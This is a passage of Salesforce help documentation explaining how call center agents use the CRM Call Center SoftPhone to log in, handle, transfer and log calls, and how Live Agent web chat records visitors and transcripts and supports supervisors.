your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
SoftPhone Overview
Call Center Overview
Salesforce CTI Toolkit Overview
Service Cloud Console Overview
Using the SoftPhone
Tip sheet: Getting Started with your SoftPhone

Editing Personal SoftPhone Settings

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo edit personal SoftPhone settings:

You can control personal SoftPhone settings within Salesforce. To change your settings, from Setup, click Call Center Settings
> My SoftPhone Settings.

The following settings are available:

DescriptionSetting

Select this option if you want Salesforce to use saved login
information to automatically log you in to your SoftPhone.

Automatically log in to your call center when
logging into Salesforce

Choose one of the following options to specify how a record
should be displayed when it is the only one that matches an
incoming call:

If only one record found on incoming call

• Always open the record automatically. This
option displays the record in the main Salesforce window,
overwriting whatever was there before. All unsaved changes
from your previous record are lost.
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DescriptionSetting

• Never open the record automatically. This
option does not display the matching record. To view it
you must click on the record's link in the SoftPhone.

See Also:
Call Center Overview
Using the SoftPhone
Logging In to the SoftPhone
Tip sheet: Getting Started with your SoftPhone

Answering a Call Using the SoftPhone
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo answer calls with a SoftPhone:

When logged in to a SoftPhone, you can receive a call when:

• The call originates from a queue and your call center state is set to Ready for Calls

• The call is dialed directly to your extension and you are not already on a call

You can tell that you have an incoming call if you see a flashing red button and the words “Incoming Call,” “Incoming Transfer,”
or “Incoming Conference” next to the name of a telephone line in your SoftPhone.

Details about the call, if any, are displayed just above the Answer button, and typically include the phone number of the caller
and the number that the caller dialed to reach you. When the caller's phone number can be matched with a number in an
existing Salesforce record, a link to that record is also displayed. Likewise, if your call center prompts callers to enter an account
number or other data before being connected with a representative, your SoftPhone searches for records that contain that
information and automatically displays links to matching results.

To answer an incoming call, you can:

• Click Answer in the SoftPhone.

• Use your physical telephone set to pick up the call.

When you answer a call, the Call Duration clock starts ticking, and your call center state is automatically set to Busy. If
you do not answer the call, the system forwards it to another user and your call center state is automatically set to Not Ready
for Calls.

Once you have answered a call, you can:

• Log comments and associate Salesforce records with the call
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• Put the caller on hold

• Transfer the call to another call center user

• Conference another call center user into the call

• End the call

If your SoftPhone supports multiple lines and you answer Line 2 while speaking on Line 1, Line 1 is automatically put on
hold.

Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

Tip: Screen pops are pages that display when incoming calls match the phone number of an existing Salesforce record.
The following table describes when screen pops display (they can only display when your call center state is set to
Ready for Calls):

Don't DisplayDisplayScreen Pops On

Edit pages

Detail pages

Detail pages when inline editing is in use

Edit pages and detail pages in the Service Cloud Console Overview

Outbound calls

See Also:
Using the SoftPhone
Changing Your Call Center State
Tip sheet: Getting Started with your SoftPhone

Logging a Call

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on casesTo log a call:

Call logs are visible only to other users in your organization.

1. Click Log Call on the Case Feed page.
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2. Enter the text for the call log.
3. By default, the contact name is the name of the case's creator. Optionally, search for a different contact.
4. Click Log Call.

Clicking Log Call displays the information in the feed.

Note:  If you’re using a SoftPhone, completed calls and call notes are logged automatically in the case’s feed. Interaction
log entries whose Status is Completed are added to the case’s feed.

After the call log appears in the feed, other internal users can click Comment to add information to it.

See Also:
Accessing Case Feed
Creating Case Notes
Communicating with Customers via the Customer Portal and Chatter Answers
Sending an Email from the Case Feed Page
Case Feed Overview

Creating Call Logs in the SoftPhone

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo create a call log:

Every external call that you make or receive with a SoftPhone automatically generates a call log activity record. You can view
these call logs in the Activity History related list of any Salesforce record that is associated with the call or by running a report.
Automatically generated call log records include values for:

• The call center user who received or initiated the call

• The phone number of the contact who called or who was called by the call center user

• The date on which the call took place

• The duration of the call, in seconds

• Whether the call was inbound or outbound

• The call center system’s unique identifier for the call

You can associate up to two records, edit the subject, and add comments to a call log while the call is underway. To do so:

1. Associate up to two the records with the call log:

• When you view or create a contact, lead, or person account, a Name drop-down list appears in the call log. Use this list
to select a single contact, lead, or person account record to associate with the call.

• When you view or create any other type of Salesforce record, a Related to drop-down list appears in the call log.
Use this list to select a single record of any other type to associate with the call.
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Note:  Custom object records can only be associated with a call log if the custom object tracks activities.

By default, the most recently viewed records are selected in the Name and Related to lists unless you manually choose
a different record. The records that you choose in these lists will include the call log in their Activity History related lists
once the call ends. These records are also displayed with the call if it is transferred to or conferenced with another Salesforce
CRM Call Center user.

2. Edit the Subject and Comments fields with information about what happened during the call.

After the call ends, the call log is automatically saved as a completed task. You can quickly access the saved call logs for calls
that were just completed by expanding the Last N Calls section of the SoftPhone. Up to three of your last calls are displayed
in this list with your most recent call displayed first:

• To modify a recent call log, click Edit next to the call log's Subject field.

• To view a saved call log, click the call log's Subject.

• To view a record that is associated with a call log, click the name of the record.

To view a list of all calls that you've made or received in the past day, click My Calls Today. This link opens the My Calls
Today report in the Reports tab.

Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
Using the SoftPhone
Wrapping Up a Call Using the SoftPhone
Tip sheet: Getting Started with your SoftPhone

Putting a Caller on Hold Using the SoftPhone

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo put a caller on hold:

Salesforce CRM Call Center allows you to put any caller on hold so that the caller can't hear you speaking. To put a caller on
hold, click Hold in the SoftPhone line that is currently active. The Hold Time clock that shows how long the caller has been
waiting automatically starts, and the line light icon ( ) begins to blink yellow.

• Callers are automatically put on hold whenever you initiate a call transfer, dial a number on a second line, or initiate a
conference call.
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• If you click Hold while on a conference, your line becomes mute but other conference participants can still speak to one
another.

To resume the call, click Retrieve from Hold. If you want to end the call without retrieving the caller from hold, click End
Call.

Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
Using the SoftPhone
Tip sheet: Getting Started with your SoftPhone

Transferring a Call Using the SoftPhone

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo transfer a call:

To transfer a call to another call center user or to an external phone number:

1. Attach any relevant Salesforce records to the call that you want to transfer. For example, if you created a case for the call,
save it, and make sure that it is selected in one of the Related To fields of the current call log. By doing this, the user to
whom you are transferring the call will have access to the case in his or her SoftPhone.

2. Click Transfer in the SoftPhone line that you want to transfer. You remain on the line with your first caller and a new
dial pad becomes active.

3. Use the dial pad, your keyboard, or the call center directory to enter the phone number of the person to whom the call
should be transferred.

4. Click Initiate Transfer. Your first caller is automatically put on hold while you are on the call with the destination number.
If a number you dial is busy, a message appears and you have the option to dial again or cancel the call.

5. When you are ready to transfer your first caller to the destination number, click Complete Transfer. If you no longer want
to transfer the call, click Cancel Transfer.
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Once you complete a transfer, your line is immediately freed and you return to the Ready for Calls state.

See Also:
Call Center Overview
Using the SoftPhone
Wrapping Up a Call Using the SoftPhone
Creating Call Logs in the SoftPhone
Tip sheet: Getting Started with your SoftPhone

Making a Conference Call Using the SoftPhone

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo initiate a conference call:

To initiate a conference call with another call center user or an outside phone number:

1. While on a call, click Conference in the SoftPhone line that is currently active. Your caller is automatically put on hold
and a new dial pad becomes active.

2. Use the dial pad, your keyboard, or the phone directory to enter the phone number of the person who you want to include
in the conference.

3. Click Initiate Conference. Your first caller remains on hold while you are on the call with the destination number. If a
number you dial is busy, a message appears and you have the option to dial again or cancel the call.

4. Once you have connected with the second caller and are ready to start the conference, click Complete Conference. The
second caller joins the first on your original telephone line and all three of you can speak freely to one another. If you no
longer want to conference the call after dialing the second number, click Cancel Conference to hang up on the second
caller and return to your original caller.

Note:

• If you click Hold while on a conference, your line becomes mute but other conference participants can still speak
to one another.

• Some phone systems limit the number of callers who can be conferenced on a single line. See your administrator
for details.

See Also:
Call Center Overview
Using the SoftPhone
Putting a Caller on Hold Using the SoftPhone
Tip sheet: Getting Started with your SoftPhone
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Wrapping Up a Call Using the SoftPhone

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo end a call:

When you are ready to end a call:

1. Update the associated call log. For example, if you created a case or viewed a contact while you were on the call, verify that
they are selected in one of the Related To fields of the log, and use the Comments text box to enter any notes about the
call.

Call logs are not created for internal calls.

2. Click End Call in the active SoftPhone line or use your physical phone set to hang up. This terminates the call and frees
the line.

3. If wrap up codes are not enabled, your call center state is set back to Ready for Calls and the log for your call is automatically
saved.

4. If wrap up codes are enabled, your call center state is set to Wrap Up and a set of reason codes are displayed in the SoftPhone.
While in this state you cannot receive any incoming calls.

a. Select the reason code that best represents the outcome of the call.
b. Optionally make any additional modifications to your call log.
c. Click Done. Your call center state returns to Ready for Calls, and the log for your call is automatically saved.

All saved call logs are placed in the Last N Calls section of the SoftPhone for quick reference. You can review details of these
call logs by clicking any of the associated links:

• The Subject link (for example, “Call 6/01/2006 12:34 PM”) opens the call log details page.

• Either of the Related To links opens the detail page for the specified record.

Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
Call Center Overview
Using the SoftPhone
Tip sheet: Getting Started with your SoftPhone
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Using the SoftPhone
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo view and use the SoftPhone:

The Salesforce CRM Call Center SoftPhone appears in the left sidebar of your Salesforce window or in the footer of the
Service Cloud console. You can use the SoftPhone to:

• Log in to your call center

• Modify your call center state to show whether you are ready to receive a new call

• Dial a phone number by using the built-in SoftPhone, or by clicking the  icon next to any phone number associated
with a contact, lead, activity, or account

• Look up a phone number in your custom call-center directory

• Answer a phone call from another call center user or an external number

• Put a caller on hold

• Initiate a conference call with another call center user or an external number

• Transfer a phone call to another call center user or an external number

• Add comments to or associate Salesforce records with an automatic call log to quickly record information related to a call

• Edit personal Salesforce CRM Call Center settings to customize the behavior of your SoftPhone

You can't collapse the sidebar if you're a Salesforce CRM Call Center user and working within the Console tab.

Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
Call Center Overview
Salesforce CRM Call Center System Requirements
Using a SoftPhone with a Service Cloud Console
Wrapping Up a Call Using the SoftPhone
Tip sheet: Getting Started with your SoftPhone
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Logging In to the SoftPhone

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo log in to Salesforce CRM Call Center:

Salesforce CRM Call Center requires you to first log in to Salesforce and then to log in separately to your organization's phone
system. The phone system login is located in the sidebar and only appears if you are:

• Assigned to a call center in Salesforce

• Using a machine on which an appropriate CTI adapter is installed. (You can quickly verify that an adapter is installed by

looking for the  icon in the system tray of your computer. The system tray is located next to the clock in the lower-right
corner of your monitor.)

If a phone system login does not appear, contact your administrator.

Depending on the phone system that your organization uses, the login prompts you to enter your user ID, password, and other
credentials. Once you have entered these values, click Log In to complete the connection to your phone system.

To automatically log in to your phone system without having to click the Log In button:

1. From Setup, click Call Center Settings > My SoftPhone Settings.
2. Select Automatically log in to your call center when logging into Salesforce. Once you have

logged in to your phone system, Salesforce remembers your login information and automatically makes a connection to
your phone system whenever you log in to Salesforce.

Note:  If you explicitly log out of the phone system at any time while you are logged in to Salesforce, automatic log
in is turned off for the remainder of your Salesforce session. To reenable automatic log in, log out of Salesforce and
then log back in.

After logging in to a phone system, your call center state is automatically set to Not Ready for Calls. If you want to receive
calls, you must change your call center state to Ready for Calls.

Tip: If you're using a CTI adapter built with version 4.0 of the CTI Toolkit, you'll be automatically logged out of
the SoftPhone after 8 hours if you have one browser tab open and go to an external Web page, or to a Salesforce page
without a sidebar (such as a dashboard). Automatic-logout times can vary because they're based on how your
administrator has configured your SoftPhone. To stay logged in, make sure you have at least one browser tab open
to a Salesforce page with a sidebar, such as Home or Cases. Automatic logout doesn't occur in the Service Cloud
console.

See Also:
Using the SoftPhone
Checking the Version of Your CTI Adapter
Salesforce CRM Call Center System Requirements
Tip sheet: Getting Started with your SoftPhone
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Changing Your Call Center State

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo change your call center state:

While logged in to Salesforce CRM Call Center, there may be times when you do not want to receive calls on your SoftPhone,
or when you need to step away from your desk. To avoid receiving calls when you do not want them, you can set your call

center state next to the  icon in the SoftPhone. Possible values for call center state include:

DescriptionCall Center State

You are not currently on a call, and you are prepared to receive
the next direct or queued call.

Ready for Calls

You are not currently on a call, and you are not prepared to
receive the next queued call.

In this state you can still receive calls that are dialed directly
to your extension.

Not Ready for Calls

You are currently connected to a caller and cannot receive
either a direct or a queued call.

On a Call

You are currently on a call, and you wish to go directly to the
Not Ready for Calls state when the call is complete.

Wrap-Up

You want to log out from your call center phone system and
remain logged in to Salesforce. After you select this option,

Log Out

Salesforce CRM Call Center automatically closes the
connection to your call center and displays the SoftPhone
login screen.

When you first log in to Salesforce CRM Call Center, your call center state is automatically set to Not Ready for Calls. You
must choose Ready for Calls from the drop-down list before you can receive any calls.
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Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
Using the SoftPhone
Logging In to the SoftPhone
Making a Call Using the SoftPhone
Wrapping Up a Call Using the SoftPhone
Tip sheet: Getting Started with your SoftPhone

Using the Call Center Directory

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo use a call center directory:

Every call center has an associated call center directory that includes the name and number of every user that belongs to that
call center, as well as other phone numbers that are related to records in your system.

To use your call center directory:

1. In the SoftPhone, click the name of the open line that you want to use. This action opens the dial pad for that line. Click

 next to the dial pad to open your call center directory.
2. Search the call center directory for a phone number:

a. In the Pick an object drop-down, choose the type of record that you want to search. Any object with a phone number
field is included in this list.

b. In the Search text box, type all or part of the name for which you are searching.
c. Click Go to view a list of only those records that include your search text.

3. When you find the phone number that you want, click its associated record name to automatically enter the number into
the SoftPhone.
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4. Click Dial to make the call.

See Also:
Call Center Overview
Using the SoftPhone
Making a Call Using the SoftPhone
Making a Conference Call Using the SoftPhone
Transferring a Call Using the SoftPhone
Tip sheet: Getting Started with your SoftPhone

Making a Call Using the SoftPhone

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo make a call:

In Salesforce CRM Call Center there are three ways to make a call:

• Dialing a number manually

• Using the call center directory

• Using click-to-dial

While on a call, you can also make a call on a second phone line by clicking New Line. The new line allows you to enter a
new phone number while remaining connected to your original caller. Once you click Dial, your original call is placed on hold,
and your new call begins.

If you make a call while your call center state is set to Ready for Calls, your state moves directly to Not Ready, and you must
enter Not Ready reason codes.

To end a call that you just dialed, click End Call. Some phone systems don't allow you to end a call from a SoftPhone before
it is answered. In these cases, an End Call button isn't displayed, and you must use your physical phone set to terminate the
call.

If a number you dial is busy, a message appears and you have the option to dial again or cancel the call.
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Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
Using the SoftPhone
Putting a Caller on Hold Using the SoftPhone
Making a Conference Call Using the SoftPhone
Transferring a Call Using the SoftPhone
Wrapping Up a Call Using the SoftPhone
Tip sheet: Getting Started with your SoftPhone

Making a Call by Dialing a Number Manually

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo make a call:

To make a call in Salesforce CRM Call Center by manually dialing a number:

1. In the SoftPhone, click the name of the open line that you want to use. This action opens the dial pad for that line.
2. Enter the phone number that you want to dial by clicking the number buttons on the dial pad, or by typing numbers on

your keyboard.
3. Click Dial or press the Enter key on your keyboard.

Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
Using the SoftPhone
Making a Call Using the Call Center Directory
Making a Call Using Click-to-Dial
Tip sheet: Getting Started with your SoftPhone
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Making a Call Using the Call Center Directory

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo make a call:

To make a call in Salesforce CRM Call Center using the call center directory:

1. In the SoftPhone, click the name of the open line that you want to use. This action opens the dial pad for that line.

2. Click  next to the dial pad to open your call center directory.
3. Use the directory to locate the number that you want to dial.
4. When you have found the number, click the name associated with the number to automatically enter the number into the

dial pad.
5. Click Dial or press the Enter key on your keyboard.

Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
Using the SoftPhone
Making a Call by Dialing a Number Manually
Making a Call Using Click-to-Dial
Tip sheet: Getting Started with your SoftPhone

Making a Call Using Click-to-Dial

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of a call centerTo make a call:

To make a call directly from the phone field of a contact, lead, activity, or account using Salesforce CRM Call Center:

1. Locate the number that you want to dial in a contact, lead, activity, or account.
2. Click the  button to the right of the number. The number is automatically dialed in the first open SoftPhone line.

• A number that has already been clicked cannot be clicked again for five seconds.
• The  button does not appear next to fax numbers.
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Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
Using the SoftPhone
Making a Call by Dialing a Number Manually
Making a Call Using the Call Center Directory
Tip sheet: Getting Started with your SoftPhone

Checking the Version of Your CTI Adapter

Available in: Professional, Enterprise, Unlimited, and Developer Editions

To check which version of the CTI adapter you've installed on your machine:

1. Run the CTI adapter from where it's installed. For example, from the Start menu, select All Programs > salesforce.com
> CTI Adapter 2.0 > Salesforce Adapter 2.0.

2. Right-click the  icon in the system tray of your computer. The system tray is located next to the clock in the lower-right
corner of your screen.

3. Click About...

The version of your CTI adapter displays under CTI Connector.

Note:  If you’re using a CTI adapter built with version 4.03 of the CTI Toolkit, a popup window displays when using
Firefox or Chrome browsers. This popup window must display on your machine to stay connected to Salesforce CRM
Call Center.

See Also:
Call Center Overview
Salesforce CRM Call Center System Requirements
Logging In to the SoftPhone

1729

Using the SoftPhoneResolving Customer Inquiries

http://na1.salesforce.com/help/doc/en/salesforce_cti_enduser_cheatsheet.pdf


WEB-CHATTING WITH CUSTOMERS

Live Agent Overview

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

Live Agent lets service organizations connect with customers or website visitors in real time through a Web-based, text-only
live chat.  The Live Agent tab displays a home page that lets you quickly review recent chat transcripts and visitor records and
launch the Live Agent console. The Live Agent console is a dedicated console used by customer service agents to manage Live
Agent chats. Agents can answer chat requests, conduct live chats, and interact with Salesforce records and Salesforce Knowledge
articles.

See Also:
Live Agent Home
Live Chat Transcripts Home
Live Chat Transcripts Overview
Live Chat Visitors Home
Live Chat Visitors Overview
Chatlet Overview
Using the Live Agent Console
Using Live Agent in the Service Cloud Console

Live Chat Visitors Overview

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

A live chat visitor record includes details about a chat between a visitor and a live chat agent. A visitor record identifies the
computer that a customer used to participate in the chat. Each visitor record is associated with a session key. Each new visitor
is associated with a session key, which Salesforce creates automatically. A session key is a unique ID, which is stored in the
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visitor record and on the visitor's PC as a cookie. If a customer participates in multiple chats, Salesforce uses the session key
to link the customer to its visitor record, associating that record to all related transcripts.

The Live Chat Visitors tab displays a home page that shows recent live chat visitors and lets you locate visitors quickly. You
can also sort and filter visitors using standard and custom list views.

See Also:
Live Chat Visitors Home
Viewing and Editing Live Chat Visitors
Viewing and Editing Live Chat Transcripts
Chatting with Visitors in the Live Agent Console
Live Agent Overview
Using the Live Agent Console

Live Chat Visitors Home

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read” on live chat visitorsTo view the Live Chat Visitors tab:

“Read” on live chat visitorsTo view visitors:

“Create” on live chat visitorsTo create visitors:

Clicking the Live Chat Visitors tab displays the live chat visitors home page.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

• In the Recent Live Chat Visitors section, select an item from the drop-down list to display a brief list of the live chat
visitors matching that criteria. From the list, click the name of a live chat visitor to go directly to the visitor detail. Toggle
the Show 25 items and Show 10 items links to change the number of items that display. The fields you see are determined
by the “Live Chat Visitor Tab” search layout defined by your administrator and by your field-level security settings (available
in Enterprise, Unlimited, and Developer Editions only). The Recent Live Chat Visitors choices are:

DescriptionRecent Live Chat Visitor Choice

The last ten or twenty-five visitors you viewed, with the
most recently viewed visitors listed first. This list is derived

Recently Viewed

from your recent items and includes records owned by you
and other users.
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DescriptionRecent Live Chat Visitor Choice

The last ten or twenty-five visitors you created, with the
most recently created listed first. This list only includes
records owned by you.

Recently Created

The last ten or twenty-five visitors you updated, with the
most recently updated listed first. This list only includes
records owned by you.

Recently Modified

• If you have the appropriate permissions, click New to create a new chat visitor record.

• Under Reports, click the link to go to the Reports tab.

• Select any link under Tools to access additional information about visitors.

See Also:
Viewing and Editing Live Chat Visitors
Live Chat Visitors Overview
Live Chat Visitor Fields
Chatting with Visitors in the Live Agent Console
Using the Live Agent Console

Live Chat Transcripts Overview

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

A live chat transcript is a record of a chat between a visitor and a live chat agent. Salesforce creates a transcript automatically
for each chat session.

For chats that are successfully completed and are ended by either the visitor or the support agent, a transcript is created as
soon as the agent closes the chat window and, if applicable, any tabs associated with it in the Service Cloud console. For chats
that end due to disconnection issues or other errors, transcripts are created by a cleanup process, which can take up to 30
minutes to run.

You can associate a transcript with cases, accounts, contacts, and leads or link it with other objects through custom lookup
fields.
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The Live Chat Transcripts tab displays a home page that shows recent live chat transcripts and lets you locate transcripts
quickly. You can also sort and filter visitors using standard and custom list views. The tab also lets you view and edit detailed
information about each transcript.

See Also:
Viewing and Editing Live Chat Transcripts
Creating Live Chat Transcripts
Live Chat Transcripts Home
Live Agent Overview

Live Chat Transcripts Home

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read” on live chat transcriptsTo view the Live Chat Transcripts tab:

“Read” on live chat transcriptsTo view transcripts:

“Create” on live chat transcriptsTo create transcripts:

Clicking the Live Chat Transcripts tab displays the live chat transcripts home page.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views.To edit or delete any view you created, select it from the View drop-down list and click Edit.

• In the Recent Live Chat Transcripts section, select an item from the drop-down list to display a brief list of the live chat
transcripts matching that criteria. From the list, click on the name of a live chat transcript to go directly to the transcript
detail. Toggle the Show 25 items and Show 10 items links to change the number of items that display. The fields you see
are determined by the “Live Chat Transcript Tab” search layout defined by your administrator and by your field-level
security settings (available in Enterprise, Unlimited, and Developer Editions only). The Recent Live Chat Transcript
choices are:

DescriptionRecent Live Chat Transcript Choice

The last ten or twenty-five transcripts you viewed, with the
most recently viewed transcripts listed first. This list is

Recently Viewed

derived from your recent items and includes records owned
by you and other users.

The last ten or twenty-five transcripts you created, with the
most recently created listed first. This list only includes
records owned by you.

Recently Created
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DescriptionRecent Live Chat Transcript Choice

The last ten or twenty-five transcripts you updated, with the
most recently updated listed first. This list only includes
records owned by you.

Recently Modified

• Click the name of a live chat visitor to go directly to a live chat visitor record.

• If you have the appropriate permissions, you can click New to create a new chat transcript record.

• Under Reports, click the link to go to the Reports tab.

• Select any link under Tools to access additional information about transcripts.

See Also:
Viewing and Editing Live Chat Transcripts
Creating Live Chat Transcripts
Live Chat Transcripts Overview
Live Chat Transcript Fields
Using the Live Agent Console

Chatlet Overview
Describes Live Agent chatlets that agents access from the Live Agent console.

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

A chatlet is a mini application that runs within the Live Agent console. There are chatlets that integrate with Salesforce and
Salesforce Knowledge, as well as chatlets that provide information on incoming chat requests, visitor geographical location,
and browsing history. Depending on what's been enabled in your agent configuration, you may see none, some, or all of the
chatlets described in the table.

DescriptionChatlet

Displays information from Salesforce tabs such as Accounts, Cases, and Contacts. During a chat, agents use
this chatlet to view or create records.

CRM on page
1743

Provides information about a visitor, including IP address, geographic location, browser, number of pages
visited before and during the chat, screen resolution, and more.

Details
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DescriptionChatlet

Integrates directly with Salesforce Knowledge. Use this chatlet to search your organization's knowledge base
for articles with information that could help visitors with their questions or problems. When you find a
pertinent article, you can download text from it and then include the information in the chat.

Knowledge on
page 1744

Shows the pages that the visitor visited before initiating the chat as well as any additional pages visited during
the chat.

Livetrack

Provides an interactive map with a pin point on the visitor's location.Map

Shows a list of your company’s chat buttons, the number of queued chat requests per button, and the hold
time for each button’s oldest incoming request. While the list includes all chat buttons, it shows queue lengths
and hold times only for those with queueing enabled

Queue

See Also:
Live Agent Overview
Agent Configuration Overview
Using the Live Agent Console
Using the CRM Chatlet
Using the Knowledge Chatlet

Live Agent Notifications Overview

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

There are two types of notifications available in Live Agent:

• Chat request notifications, which alert support agents to incoming chats

• Disconnect notifications, which signal that a support agent has been disconnected from the Live Agent console

Administrators can enable notifications when creating or editing chat deployments. See Creating Deployments for more
information.

Notes and Limitations

• Chat request notifications are available as audio alerts and as desktop alerts.
• Audio alerts are available in the following browsers:

◊ Mozilla® Firefox®, most recent stable version
◊ Google Chrome™, most recent stable version
◊ Apple® Safari® versions 5.x and 6.x on Mac OS X
◊ Windows® Internet Explorer® version 9
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• Desktop alerts are available only in the most recent stable version of Google Chrome.
• After desktop alerts are enabled in a chat deployment, support agents must enable them in their browsers by clicking

Enable Notifications in the chat request list in the agent console.
• Once agents have enabled desktop alerts in their browsers, alerts appear each time a new chat request is available.

Live Agent Supervisor Page Overview

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

Access to the Live Agent Supervisor tab in a user profile or
permission set

To use the Live Agent Supervisor page:

The Live Agent Supervisor page makes it easy to find information about your department’s chat buttons and chat agents, all
in one place.

To access the Supervisor page, click the Live Agent Supervisor tab. From there, you can:

• See a list of all of your organization’s active chat buttons, with information on the length of each button’s queue and longest
wait time. Click a button’s name to see its detail page.

Note:  Queue length and wait time information is only available for buttons with queueing enabled. Buttons
without queueing will show a queue length of 0 and N/A as the time of the longest wait.

• See a list of all of your organization’s chat agents, along with their statuses, the number of their active chat sessions, how
many chats they are currently engaged in, how many chats they are assigned to but haven’t yet accepted, how long they’ve
been logged in to Live Agent, and how long it’s been since they last accepted a chat request.

◊ Click an agent’s name or ID to view their profile page.

◊ Click  next to an agent’s name to see a detailed list of their current chat sessions.
◊ To see only agents with a certain skill, choose the skill from the drop-down on the right side of the page.

◊ Use the links in the Action column to change an agent’s status:

ResultsThese Actions Are AvailableIf the Agent’s Status Is

Offline

Away

Available - Offline: Logs the agent out of the
chat console. Agents who are
logged out can’t accept incoming
chat request.

- Away: Sets the agent’s status to
Away but keeps them logged in to
the chat console. Agents who are
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ResultsThese Actions Are AvailableIf the Agent’s Status Is

away can’t accept new chat
requests.

Logs the agent out of the chat console.
Agents who are logged out can’t accept
incoming chat request.

OfflineAway

Note:  You can’t change the
status of agents who are
offline.

◊ Monitor an agent’s chats with customers in the ongoing chat window on the right side of the Agent Status panel.

◊ Send “whisper messages” to agents in the ongoing chat window while they chat with customers. Customers can’t see
these messages, so you can privately chat with agents while they interact with customers.

See Also:
Live Agent Home

Live Agent Home

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read” on live agentTo view the Live Agent tab:

“Read” on live chat transcriptsTo view transcripts:

“Read” on live chat visitorsTo view visitors:

Clicking the Live Agent tab displays the live agent home page.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views.To edit or delete any view you created, select it from the View drop-down list and click Edit.

• In the Recent Live Chats section, select an item from the drop-down list to display a brief list of the live chats matching
that criteria. From the list, click on the name of a live chat transcript to go directly to the transcript detail. Toggle the
Show 25 items and Show 10 items links to change the number of items that display. The fields you see are determined by
your field-level security settings (available in Enterprise, Unlimited, and Developer Editions only). The Recent Live Chats
choices are:
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DescriptionRecent Live Chats Choice

The last ten or twenty-five chats you viewed, with the most
recently viewed chats listed first. This list is derived from

Recently Viewed

your recent items and includes records owned by you and
other users.

The last ten or twenty-five chats you created, with the most
recently created listed first. This list only includes records
owned by you.

Recently Created

The last ten or twenty-five chats you updated, with the most
recently updated listed first. This list only includes records
owned by you.

Recently Modified

• Click the name of a live chat visitor on page 1732 to go directly to a visitor record.

